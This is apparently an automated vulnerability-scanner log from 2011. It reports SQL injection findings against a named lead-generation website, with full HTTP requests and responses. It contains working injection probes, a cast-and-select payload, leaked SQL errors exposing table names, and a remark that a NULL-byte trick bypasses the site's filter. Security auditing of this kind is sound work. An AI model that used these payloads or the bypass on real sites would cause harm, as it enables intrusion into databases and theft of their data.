select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/hins00/project_dynamic_page_updated.php'?catId=50002&group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php'?catId=50002&group=hins00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:29:52 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=0scj77qrsfm4qe2pa4sj5jn031; path=/ Content-Length: 2494 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... adflow/hins00/project_dynamic_page_updated.php?catId=50002.'&group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?catId=50002.'&group=hins00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00/project_dyna' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:31:19 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=2nsricmtludcfkpsts5nhqfur1; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/hins00/project_dynamic_page_updated.php?catId=50002'&group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?catId=50002'&group=hins00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00/project_dyna' at line 5
The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:29:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=o5r8pf8cnl6ns41s75ojv3bvf5; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00'&template=3' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?ca' at line 5
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:36:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ioo791vp0qnu5j0urkdtqpej17; path=/ Content-Length: 2518 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... /hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3&1'=1' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?ca' at line 5
The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:31:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=6b28c6h2ov52ujb8mb5bmm25l1; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3'' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&templa' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow'/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:36:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=i0hm7o36ccgq7vmt3jlr3ih8v2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=110006&iusrc=iupsc&address=cast((select chr(95)||chr(33)||chr(64)||chr(53' at line 5
Request 2
GET /ppc/leadflow''/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:36:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=79p5gdnj274j3ou97gl8atlat3; path=/ Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/incn00/project.php was not found on this server.</p>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00'/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:36:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=immvv3t2bacib9rjmd321g3p66; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=110006&iusrc=iupsc&address=cast((select chr(95)||chr(33)||chr(64)||chr(53' at line 5
Request 2
GET /ppc/leadflow/incn00''/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:36:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=937nduq4ujsf9f33r924iu5u46; path=/ Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/incn00''/project.php was not found on this server.</p>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php'?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:36:39 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=esdtahjrcf1tiqg0hduksogjt2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=110006&iusrc=iupsc&address=cast((select chr(95)||chr(33)||chr(64)||chr(53' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php''?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:36:39 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qc6ckv2n7qotocse2v9gmc67m5; path=/ Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/incn00/project.php'' was not found on this server.</p>
The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:15 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=hvpdsp4iaeijni5r57jiu0gto2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2976__Internet access&attributeId_459=2985__Yes - DSL&attributeId_460=2990__1' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:15 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=r2f5ipi10hjc7vosjvq3se21v7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1g5aasj5i0luk73v6jjkl591k7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2976__Internet access&attributeId_459=2985__Yes - DSL&attributeId_460=2990__1' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance''&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=jmd8dnfmd01abucjveaiarij11; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
